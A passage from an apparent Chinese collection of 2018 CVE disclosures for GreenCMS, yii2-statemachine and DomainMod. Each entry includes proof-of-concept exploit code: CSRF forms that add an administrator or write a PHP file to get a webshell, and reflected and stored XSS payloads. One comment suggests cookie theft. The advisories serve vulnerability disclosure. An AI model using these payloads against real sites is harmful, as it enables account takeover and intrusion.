      <input type="hidden" name="admin_id" value="" />
      <input type="hidden" name="admin_name" value="test2" />
      <input type="hidden" name="admin_pwd" value="test2" />
      <input type="hidden" name="admin_status" value="1" />
      <input type="hidden" name="admin_auth[0]" value="index/welcome" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/42/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12114
漏洞发现者blog:https://www.cnblogs.com/v1vvwv/p/9168309.html
exploit-db:发布中

CVE-2018-12290:yii2-statemachine v2.x.x存在XSS漏洞

一、漏洞摘要

漏洞名称: yii2-statemachine v2.x.x存在XSS漏洞
上报日期: 2018-06-12
漏洞发现者: longer
产品首页: https://github.com/ptheofan/yii2-statemachine-demo
软件链接: https://github.com/ptheofan/yii2-statemachine-demo
版本: v2.x.x
CVE编号: CVE-2018-12290


二、漏洞概述

由于role参数过滤不严格,导致可以插入js代码造成跨站脚本攻击。如将role参数赋值为“guest'%22()%26%25<acx><ScRiPt%20>prompt(123555)</ScRiPt>”,并进行get方式提交,可造成跨站脚本攻击。
xss1.png

三、利用代码

exp代码如下:

https://127.0.0.1/?role=guest'%22()%26%25<acx><ScRiPt%20>prompt(123555)</ScRiPt>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/40/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12290
exploit-db:发布中

CVE-2018-11671:GreenCMS v2.3.0603存在CSRF漏洞可增加管理员账户

一、漏洞摘要

漏洞名称: GreenCMS v2.3.0603存在CSRF漏洞可增加管理员账户
上报日期: 2018-06-02
漏洞发现者: 惜潮
产品首页: https://github.com/GreenCMS/GreenCMS
软件链接: https://github.com/GreenCMS/GreenCMS
版本: v2.3.0603
CVE编号: CVE-2018-11671


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面添加管理员账户对网站进行入侵。GreenCMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

exp代码如下:

<span style="font-size:18px;"><!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <title>csrf测试</title>  
</head>  
  <body>  
        <form action="http://127.0.0.1//14/index.php?m=admin&c=access&a=adduserhandle" method="POST" id="transfer" name="transfer">  
        <input type="hidden" name="user_id0" value="1">  
        <input type="hidden" name="user_login" value="test1">  <!--在这里可以添加JS脚本用于获取cookies  csrf+xss-->
        <input type="hidden" name="password" value="test1">  
        <input type="hidden" name="rpassword" value="test1">  
        <input type="hidden" name="user_nicename" value="123">  
        <input type="hidden" name="user_email" value="123%40Qq.com">  
        <input type="hidden" name="user_url" value="www.baidu.com">  
        <input type="hidden" name="user_intro" value="test">  
        <input type="hidden" name="user_status" value="1">  
        <input type="hidden" name="role_id" value="1">
        <button type="submit" value="Submit">添加管理员</button>  
      </form>  
    </body>
</html></span>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/39/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11671
exploit-db:发布中

CVE-2018-11670:GreenCMS v2.3.0603存在CSRF漏洞可获取webshell

一、漏洞摘要

漏洞名称: GreenCMS v2.3.0603存在CSRF漏洞可获取webshell
上报日期: 2018-06-02
漏洞发现者: 惜潮
产品首页: https://github.com/GreenCMS/GreenCMS
软件链接: https://github.com/GreenCMS/GreenCMS
版本: v2.3.0603
CVE编号: CVE-2018-11670


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面 从而获取网站webshell。GreenCMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

exp代码如下:

<span style="font-size:18px;"><!DOCTYPE html> 
<html lang="en"> 
<head> 
    <meta charset="UTF-8"> 
    <title>csrf测试</title> 
</head> 
<form action="http://127.0.0.1//14/index.php?m=admin&c=media&a=fileconnect" method="POST" id="transfer" name="transfer">
    <!-- 下面的是生成文件名为xc.php的脚本文件 路径 127.0.0.1/Upload/xc.php -->
    <script src="http://127.0.0.1/14/index.php?m=admin&c=media&a=fileconnect&cmd=mkfile&name=xc.php&target=l1_XA&_=1527839615462"></script>
    <input type="hidden" name="cmd" value="put">
    <input type="hidden" name="target" value="l1_eGMucGhw">
     <input type="hidden" name="content" value="<?php phpinfo();?>">
    <!-- 下面的是提交表单 将content中的命令写入脚本内 -->
    <button type="submit" value="Submit">WebShell</button>
    </form>
    </body>
</html></span>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/38/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11670
exploit-db:发布中

CVE-2018-11559:DomainMod 4.10.0存在存储型XSS漏洞

一、漏洞摘要

漏洞名称: DomainMod 4.10.0存在存储型XSS漏洞
上报日期: 2018-05-30
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/domainmod/domainmod
软件链接: https://github.com/domainmod/domainmod
版本: 4.10.0
CVE编号: CVE-2018-11559


二、漏洞概述

DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_last_name”参数过滤不严格导致存在一个存储型XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发:

post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/37/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11559
exploit-db:发布中